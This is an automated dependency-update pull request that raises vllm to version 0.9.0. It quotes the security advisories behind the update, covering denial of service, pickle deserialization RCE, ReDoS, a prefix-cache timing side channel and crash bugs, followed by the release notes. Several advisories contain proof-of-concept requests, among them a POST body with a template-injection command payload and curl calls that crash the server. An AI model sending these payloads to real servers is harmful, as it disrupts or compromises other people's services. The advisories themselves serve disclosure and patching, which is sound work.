Update dependency vllm to v0.9.0 [SECURITY] - autoclosed #31
  Add this suggestion to a batch that can be applied as a single commit.
  This suggestion is invalid because no changes were made to the code.
  Suggestions cannot be applied while the pull request is closed.
  Suggestions cannot be applied while viewing a subset of changes.
  Only one suggestion per line can be applied in a batch.
  Add this suggestion to a batch that can be applied as a single commit.
  Applying suggestions on deleted lines is not supported.
  You must change the existing code in this line in order to create a valid suggestion.
  Outdated suggestions cannot be applied.
  This suggestion has been applied or marked resolved.
  Suggestions cannot be applied from pending reviews.
  Suggestions cannot be applied on multi-line comments.
  Suggestions cannot be applied while the pull request is queued to merge.
  Suggestion cannot be applied right now. Please check back later.
  
    
  
    
This PR contains the following updates:
==0.8.0->==0.9.0GitHub Vulnerability Alerts
GHSA-hf3c-wxg2-49q9
Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the
guided_decoding_backendkey of theextra_bodyfield of the request with the V0 engine. This per-request choice is not available when using the V1 engine.Patches
Workarounds
There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
CVE-2025-30202
Impact
In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an
XPUBZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.Any client with network access to this host can connect to this
XPUBsocket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.
Detailed Analysis
The
XPUBsocket in question is created here:https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237
Data is published over this socket via
MessageQueue.enqueue()which is called byMessageQueue.broadcast_object():https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453
https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478
The
MessageQueue.broadcast_object()method is called by theGroupCoordinator.broadcast_object()method inparallel_state.py:https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366
The broadcast over ZeroMQ is only done if the
GroupCoordinatorwas created withuse_message_queue_broadcasterset toTrue:https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219
The only case where
GroupCoordinatoris created withuse_message_queue_broadcasteris the coordinator for the tensor parallelism group:https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936
To determine what data is broadcasted to the tensor parallism group, we must continue tracing.
GroupCoordinator.broadcast_object()is called byGroupCoordinator.broadcoast_tensor_dict():https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489
which is called by
broadcast_tensor_dict()incommunication_op.py:https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34
If we look at
_get_driver_input_and_broadcast()in the V0worker_base.py, we'll see how this tensor dict is formed:https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352
but the data actually sent over ZeroMQ is the
metadata_listportion that is split from thistensor_dict. The tensor parts are sent viatorch.distributedand only metadata about those tensors is sent via ZeroMQ.https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83
Patches
Workarounds
Prior to the fix, your options include:
XPUBsocket. Note that port used is random.References
CVE-2025-32444
Impacted Deployments
Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.
Description
vLLM integration with mooncake is vaulnerable to remote code execution due to using
picklebased serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.This is a similar to GHSA - x3m8 - f7g5 - qhm7, the problem is in
https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179
Here recv_pyobj() Contains implicit
pickle.loads(), which leads to potential RCE.CVE-2025-46560
Summary
A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs.
Details
Affected Component: input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197
The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.
PoC
Test data demonstrates exponential time growth:
Doubling input size increases runtime by ~4x (consistent with O(n²)).
Impact
Denial-of-Service (DoS): An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.
Remediation Recommendations
Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.
CVE-2025-47277
Impacted Environments
This issue ONLY impacts environments using the
PyNcclPipeKV cache transfer integration with the V0 engine. No other configurations are affected.Summary
vLLM supports the use of the
PyNcclPipeclass to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through thePyNcclCommunicatorclass, while CPU-side control message passing is handled via thesend_objandrecv_objmethods on the CPU side.A remote code execution vulnerability exists in the
PyNcclPipeservice. Attackers can exploit this by sending malicious serialized data to gain server control privileges.The intention was that this interface should only be exposed to a private network using the IP address specified by the
--kv-ipCLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.htmlUnfortunately, the default behavior from PyTorch is that the
TCPStoreinterface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force theTCPStoreinstance to bind its socket to a specified private interface.This issue was reported privately to PyTorch and they determined that this behavior was intentional.
Details
The
PyNcclPipeimplementation contains a critical security flaw where it directly processes client-provided data usingpickle.loads, creating an unsafe deserialization vulnerability that can lead to Remote Code Execution.PyNcclPipeservice configured to listen on port18888when launched:PyNcclPipeservice:The call stack triggering RCE is as follows:
Getshell as follows:
Reporters
This issue was reported independently by three different parties:
Fix
TCPStoresocket to the private interface as configured.CVE-2025-48887
Summary
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file
vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.pyof the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.Details
The following regular expression is used to match tool/function call patterns:
This pattern contains multiple nested quantifiers (
*,+), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.Attack Example:
A malicious input such as
can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).
Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.
Impact
Fix
GHSA-j828-28rj-hfhp
Summary
A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.
1. vllm/lora/utils.py Line 173
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:
r"\((.*?)\)\$?$"matches content inside parentheses. If input such as((((a|)+)+)+)is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability..*?(non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.Remediation Suggestions:
2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52
Risk Description:
r'functools\[(.*?)\]'uses.*?to match content inside brackets, together withre.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.Remediation Suggestions:
model_output.re.finditer()and enforce a length constraint on each match.3. vllm/entrypoints/openai/serving_chat.py Line 351
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351
Risk Description:
r'.*"parameters":\s*(.*)'can trigger backtracking ifcurrent_textis very long and contains repeated structures..*matching any content is high risk.Remediation Suggestions:
current_textlength..*to capture large blocks of text; prefer structured parsing when possible.4. benchmarks/benchmark_serving_structured_output.py Line 650
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650
Risk Description:
r'\{.*\}'is used to extract JSON inside curly braces. If theactualstring is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.Remediation Suggestions:
actual.{and}or use a robust JSON extraction tool.Fix
CVE-2025-46570
This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.
Description
When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.
For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.
Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
Environment
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage
We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results
In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:
Fixes
CVE-2025-46722
Summary
In the file
vllm/multimodal/hasher.py, theMultiModalHasherclass has a security and data integrity issue in its image hashing method. Currently, it serializesPIL.Image.Imageobjects using onlyobj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.Details
vllm/multimodal/hasher.pyMultiModalHasher.serialize_itemhttps://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
Image.Imageinstances, onlyobj.tobytes()is used for hashing.obj.tobytes()does not include the image’s width, height, or mode metadata.Recommendation
In the
serialize_itemmethod, serialization ofImage.Imageobjects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially theinfodictionary. Theinfodictionary is particularly important in palette-based images (e.g., mode'P'), where the palette itself is stored ininfo. Ignoringinfocan result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (
size,mode,format,info) in the hash calculation to prevent collisions, especially in cases like palette-based images.Impact for other modalities
For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.
For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.
Fixes
CVE-2025-48942
Summary
Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server
Details
The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.pyIssue with more information: https://github.com/vllm-project/vllm/issues/17248
PoC
Make a call to vllm with invalid json_scema e.g.
{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'Impact
vllm crashes
example traceback
Fix
CVE-2025-48943
Impact
A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.
Issue with more details: https://github.com/vllm-project/vllm/issues/17313
Patches
CVE-2025-48944
Summary
The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.
Details
The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:
RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.
For example, the following inputs will crash the worker:
Unclosed {, [, or (
Closed:{} and []
Here are some of runtime errors on the crash depending on what gets injected:
RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
PoC
Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}
Impact
Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.
Fix
Release Notes
vllm-project/vllm (vllm)
v0.9.0Compare Source
Highlights
This release features 649 commits, from 215 contributors (82 new contributors!)
pip install https://download.pytorch.org/whl/cu128/flashinfer/flashinfer_python-0.2.5%2Bcu128torch2.7-cp38-abi3-linux_x86_64.whlthen setVLLM_ATTENTION_BACKEND=FLASHINFERfor better performance.Notable Changes
top_kto be disabled with0(still accept-1for now) (#17773)0by default for V1 Engine, meaning that different vLLM runs now yield the same outputs even iftemperature > 0. This does not modify the random state in user code since workers are run in separate processes unlessVLLM_USE_V1_MULTIPROCESSING=0. (#17929, #18741)Model Enhancements
transformers(from source) to use Falcon-H1.Performance, Production and Scaling
torchrun(#17827)Security
VLLM_ALLOW_INSECURE_SERIALIZATIONenv var (#17490)Features
deprecated=True(#17426)chat_template_kwargsinLLM.chat(#17356),/classifyendpoint (#17032), truncation control for embedding models (#14776),cached_tokensin response usage (#18149)nvidia/DeepSeek-R1-FP4(#16362), Quark MXFP4 format (#16943), AutoRound (#17850), torchao models withAOPerModuleConfig(#17826), CUDA Graph support for V1 GGUF support (#18646)--enable-reasoning(#17452)tool_choice: requiredfor Xgrammar (#17845), Structural Tag with Guidance backend (#17333)Hardwares
Documentation
--torch-backend=auto(#18505)Developer Facing
vllm.multimodal(#18031)ruff format(#17656, #18068, #18400)What's Changed
numel()downcast in fused_layernorm_dynamic_per_token_quant.cu by @r-barnes in https://github.com/vllm-project/vllm/pull/17316'<string>'filepath by @zou3519 in https://github.com/vllm-project/vllm/pull/17330pre-commit autoupdateby @hmellor in https://github.com/vllm-project/vllm/pull/17380chat_template_kwargsinLLM.chatby @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17356cutlass_mla_decodefor ROCm build by @tywuAMD in https://github.com/vllm-project/vllm/pull/17289python3 setup.py developwith standardpip install --eon TPU by @NickLucche in https://github.com/vllm-project/vllm/pull/17374Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.